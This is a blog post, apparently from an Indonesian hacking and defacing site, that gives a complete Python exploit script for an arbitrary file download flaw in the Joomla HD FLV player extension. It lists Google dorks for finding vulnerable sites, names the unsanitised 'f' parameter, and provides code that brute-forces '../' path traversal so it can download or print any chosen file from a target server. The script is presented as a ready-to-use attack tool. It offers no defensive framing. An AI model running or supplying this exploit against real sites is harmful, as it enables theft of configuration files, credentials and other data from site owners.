Header Ads

Home > Defacing > Exploit > Injection > Tutorial > Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability

Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability

Monday, November 21, 2016 , , ,


    #!/usr/bin/env python
    #
    # Exploit Title :  Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability
    #
    # Exploit Author : Mr.XSecr3t
    #
    # Vendor Homepage : http://www.hdflvplayer.net/
    #
    # Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
    #
    # Dork google 1:  inurl:/component/hdflvplayer/
    # Dork google 2:  inurl:com_hdflvplayer   
    #
    # Date : 2016-1-2
    #
    # Tested on : BackBox 3.x/4.x
    #
    # Info:
    #       Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=
    #       The variable "f" is not sanitized.
    #       Over 80.000 downloads (statistic reported on official site)
    #
    #
    # Video Demo : https://www.youtube.com/78c6d77dfXg
    #
    #
    # Http connection
    import urllib, urllib2
    # String manipulation
    import re
    # Time management
    import time
    # Args management
    import optparse
    # Error management
    import sys
    
    banner = """
           _______                      __           ___ ___ ______
          |   _   .-----.-----.--------|  .---.-.   |   Y   |   _  \\
          |___|   |  _  |  _  |        |  |  _  |   |.  1   |.  |   \\
          |.  |   |_____|_____|__|__|__|__|___._|   |.  _   |.  |    \\
          |:  1   |                                 |:  |   |:  1    /
          |::.. . |                                 |::.|:. |::.. . /
          `-------'                                 `--- ---`------'
           _______ ___     ___ ___     _______ __
          |   _   |   |   |   Y   |   |   _   |  .---.-.--.--.-----.----.
          |.  1___|.  |   |.  |   |   |.  1   |  |  _  |  |  |  -__|   _|
          |.  __) |.  |___|.  |   |   |.  ____|__|___._|___  |_____|__|
          |:  |   |:  1   |:  1   |   |:  |            |_____|
          |::.|   |::.. . |\:.. ./    |::.|
          `---'   `-------' `---'     `---'
    
                                            <= 2.1.0.1 Remote File Download
    
                                   Written by:
    
                                    Mr.XSecr3t
    
                        https://www.facebook.com/vaniatufik
    
                                 ICDT@grupcyber.com
                             anonn404notfound@gmail.com
    
              https://www.facebook.com/groups/IndonesianCyberDarkNetTeam
    """
    
    # Check url
    def checkurl(url):
        if url[:8] != "https://" and url[:7] != "http://":
            print('[X] You must insert http:// or https:// procotol')
            sys.exit(1)
        else:
            return url
    
    
    def checkcomponent(url,headers):
    
        try:
            req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php', None, headers)
            sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
            print("")
        except urllib2.HTTPError:
            sys.stdout.write("\r[+] Searching HD FLV Extension...: Not FOUND :(")
            sys.exit(1)
        except urllib2.URLError:
            print '[X] Connection Error'
    
    def checkversion(url,headers):
    
        try:
            req = urllib2.Request(url+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
            response = urllib2.urlopen(req).readlines()
    
            for line_version in response:
    
                if not line_version.find("<version>") == -1:
    
                    VER = re.compile('>(.*?)<').search(line_version).group(1)
    
                    sys.stdout.write("\r[+] Checking Version: "+str(VER))
            print("")
    
        except urllib2.HTTPError:
           sys.stdout.write("\r[+] Checking Version: Unknown")
    
        except urllib2.URLError:
            print("\n[X] Connection Error")
            sys.exit(1)
    
    def connection(url,headers,pathtrav):
    
        char = "../"
        bar = "#"
        s = ""
        barcount = ""
    
        for a in range(1,20):
    
            s += char
            barcount += bar
            sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
            sys.stdout.flush()
    
            try:
                req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php?f='+s+pathtrav, None, headers)
                response = urllib2.urlopen(req)
    
                content = response.read()
    
                if content != "" and not "failed to open stream" in content:
                    print("\n[!] VULNERABLE")
                    print("[*] 3v1l Url: "+url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav)
                    print("")
                    print("[+] Mau Didownload apa di Read Cuk?")
                    print("[+]")
                    sys.stdout.write("\r[+] Mau Didownload apa di Read Cuk?: ")
    
                    download = set(['d'])
                    read  = set(['r'])
    
                    while True:
                        choice = raw_input().lower()
                        if choice in download:
                            filedown = pathtrav.split('/')[-1]
                            urllib.urlretrieve (url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav, filedown)
                            print("[!] Sip Deh KeDownload!")
                            print("[!] Check file: "+filedown)
                            return True
                        elif choice in read:
                            print("")
                            print content
                            return True
                        else:
                            sys.stdout.write("\r[X] lease respond with 'D' or 'R': ")
    
            except urllib2.HTTPError:
                #print '[X] HTTP Error'
                pass
            except urllib2.URLError:
                print '\n[X] Connection Error'
    
            time.sleep(1)
        print("\n[X] Filenya ga ketemu Cuk -_- :(")
    
    commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME')
    commandList.add_option('-t', '--target', action="store",
                      help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                      )
    commandList.add_option('-f', '--file', action="store",
                      help="Insert file to check",
                      )
    options, remainder = commandList.parse_args()
    
    # Check args
    if not options.target or not options.file:
        print(banner)
        commandList.print_help()
        sys.exit(1)
    
    print(banner)
    
    url = checkurl(options.target)
    pathtrav = options.file
    
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
    
    sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
    checkcomponent(url,headers)
    sys.stdout.write("\r[+] Checking Version: ")
    checkversion(url,headers)
    sys.stdout.write("\r[+] Exploiting...please wait:")
    connection(url,headers,pathtrav)

Post a Comment

No comments

Silahkan Komentar dengan bahasa yang sopan

Subscribe to: Post Comments ( Atom )
Powered by Blogger.